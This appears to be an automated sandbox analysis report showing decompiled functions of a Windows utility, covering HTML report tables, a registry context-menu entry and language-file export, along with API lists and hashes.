                                                                                                                0x00403e68
                                                                                                                0x00403e6d
                                                                                                                0x00403e70
                                                                                                                0x00403e71
                                                                                                                0x00403e71
                                                                                                                0x00403e87
                                                                                                                0x00403e8d
                                                                                                                0x00403e9e
                                                                                                                0x00403ea6
                                                                                                                0x00403eaf
                                                                                                                0x00403ebc

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                0x00407763
                                                                                                                0x0040776c
                                                                                                                0x00407784
                                                                                                                0x0040778b
                                                                                                                0x00407797
                                                                                                                0x00407799
                                                                                                                0x0040779b
                                                                                                                0x004077a7
                                                                                                                0x004077ae
                                                                                                                0x004077bd
                                                                                                                0x004077c4
                                                                                                                0x004077d3
                                                                                                                0x004077da
                                                                                                                0x004077e1
                                                                                                                0x004077e6
                                                                                                                0x004077f2
                                                                                                                0x004077f5
                                                                                                                0x00407804
                                                                                                                0x00407805
                                                                                                                0x00407810
                                                                                                                0x00407812
                                                                                                                0x00407813
                                                                                                                0x00407818
                                                                                                                0x00407818
                                                                                                                0x00407825
                                                                                                                0x0040782d
                                                                                                                0x00407830
                                                                                                                0x0040783a
                                                                                                                0x00407840
                                                                                                                0x00407846
                                                                                                                0x00407849
                                                                                                                0x00407850
                                                                                                                0x0040785e
                                                                                                                0x00407864
                                                                                                                0x00407867
                                                                                                                0x0040786b
                                                                                                                0x0040786f
                                                                                                                0x00407877
                                                                                                                0x0040787a
                                                                                                                0x00407885
                                                                                                                0x00407892
                                                                                                                0x004078a8
                                                                                                                0x004078b8
                                                                                                                0x004078c5
                                                                                                                0x004078ff
                                                                                                                0x004078c7
                                                                                                                0x004078ca
                                                                                                                0x004078dd
                                                                                                                0x004078de
                                                                                                                0x004078e3
                                                                                                                0x004078e8
                                                                                                                0x004078eb
                                                                                                                0x004078f0
                                                                                                                0x004078f0
                                                                                                                0x00407906
                                                                                                                0x00407909
                                                                                                                0x0040790f
                                                                                                                0x0040791d
                                                                                                                0x00407923
                                                                                                                0x0040792d
                                                                                                                0x00407932
                                                                                                                0x0040793b
                                                                                                                0x00407942
                                                                                                                0x00407943
                                                                                                                0x0040794c
                                                                                                                0x00407953
                                                                                                                0x00407954
                                                                                                                0x00407959
                                                                                                                0x0040795c
                                                                                                                0x00407961
                                                                                                                0x0040796c
                                                                                                                0x00407971
                                                                                                                0x0040797a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00407838
                                                                                                                0x00407838
                                                                                                                0x0040783a
                                                                                                                0x00407980
                                                                                                                0x0040798a
                                                                                                                0x004079a1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                0x00407b65
                                                                                                                0x00407b7c
                                                                                                                0x00407b83
                                                                                                                0x00407b91
                                                                                                                0x00407b98
                                                                                                                0x00407ba6
                                                                                                                0x00407bad
                                                                                                                0x00407bb2
                                                                                                                0x00407bb9
                                                                                                                0x00407bca
                                                                                                                0x00407bcb
                                                                                                                0x00407bd6
                                                                                                                0x00407bdb
                                                                                                                0x00407bdc
                                                                                                                0x00407be1
                                                                                                                0x00407be1
                                                                                                                0x00407be8
                                                                                                                0x00407bf9
                                                                                                                0x00407bfa
                                                                                                                0x00407c05
                                                                                                                0x00407c0a
                                                                                                                0x00407c0b
                                                                                                                0x00407c1c
                                                                                                                0x00407c21
                                                                                                                0x00407c21
                                                                                                                0x00407c2a
                                                                                                                0x00407c2b
                                                                                                                0x00407c36
                                                                                                                0x00407c3b
                                                                                                                0x00407c3c
                                                                                                                0x00407c41
                                                                                                                0x00407c51
                                                                                                                0x00407c56
                                                                                                                0x00407c5b
                                                                                                                0x00407c65
                                                                                                                0x00407c68
                                                                                                                0x00407c6b
                                                                                                                0x00407c74
                                                                                                                0x00407c7b
                                                                                                                0x00407c80
                                                                                                                0x00407c82
                                                                                                                0x00407c88
                                                                                                                0x00407ca6
                                                                                                                0x00407c8a
                                                                                                                0x00407c8a
                                                                                                                0x00407c8b
                                                                                                                0x00407c96
                                                                                                                0x00407c9b
                                                                                                                0x00407c9c
                                                                                                                0x00407ca1
                                                                                                                0x00407ca1
                                                                                                                0x00407cb3
                                                                                                                0x00407cb4
                                                                                                                0x00407cbd
                                                                                                                0x00407cc4
                                                                                                                0x00407cc5
                                                                                                                0x00407cd0
                                                                                                                0x00407cd5
                                                                                                                0x00407cd6
                                                                                                                0x00407cdb
                                                                                                                0x00407ceb
                                                                                                                0x00407cf0
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00000000
                                                                                                                0x00407cfc
                                                                                                                0x00407d00

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                0x00404415
                                                                                                                0x0040441d
                                                                                                                0x0040442c
                                                                                                                0x00404435
                                                                                                                0x004045b3
                                                                                                                0x004045b7
                                                                                                                0x004045b7
                                                                                                                0x0040444b
                                                                                                                0x00404452
                                                                                                                0x00404457
                                                                                                                0x00404460
                                                                                                                0x00404461
                                                                                                                0x00404462
                                                                                                                0x0040446d
                                                                                                                0x00404472
                                                                                                                0x00404473
                                                                                                                0x00404490
                                                                                                                0x004044a5
                                                                                                                0x004044b4
                                                                                                                0x004044b6
                                                                                                                0x004044b7
                                                                                                                0x004044bd
                                                                                                                0x004044cf
                                                                                                                0x004044db
                                                                                                                0x004044eb
                                                                                                                0x004044f1
                                                                                                                0x004044f6
                                                                                                                0x004044f9
                                                                                                                0x004044fe
                                                                                                                0x00404506
                                                                                                                0x00404507
                                                                                                                0x00404508
                                                                                                                0x00404510
                                                                                                                0x00404521
                                                                                                                0x00404532
                                                                                                                0x00404539
                                                                                                                0x00404547
                                                                                                                0x0040454e
                                                                                                                0x0040455b
                                                                                                                0x0040455c
                                                                                                                0x00404564
                                                                                                                0x0040456f
                                                                                                                0x00404570
                                                                                                                0x00404571
                                                                                                                0x0040457c
                                                                                                                0x0040457d
                                                                                                                0x00404588
                                                                                                                0x00404589
                                                                                                                0x0040458a
                                                                                                                0x004045a0
                                                                                                                0x004045a5
                                                                                                                0x00404521
                                                                                                                0x004044eb
                                                                                                                0x004045ab
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                0x00406466
                                                                                                                0x0040647d
                                                                                                                0x00406484
                                                                                                                0x00406499
                                                                                                                0x004064a0
                                                                                                                0x004064af
                                                                                                                0x004064b4
                                                                                                                0x004064bb
                                                                                                                0x004064cd
                                                                                                                0x004064d2
                                                                                                                0x004064d4
                                                                                                                0x004064e4
                                                                                                                0x004064ea
                                                                                                                0x004064ea
                                                                                                                0x004064f3
                                                                                                                0x00406503
                                                                                                                0x00406514
                                                                                                                0x00406525
                                                                                                                0x0040653b
                                                                                                                0x0040654e
                                                                                                                0x00406568
                                                                                                                0x00406572
                                                                                                                0x0040657a
                                                                                                                0x00406582
                                                                                                                0x0040658a
                                                                                                                0x00406596

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
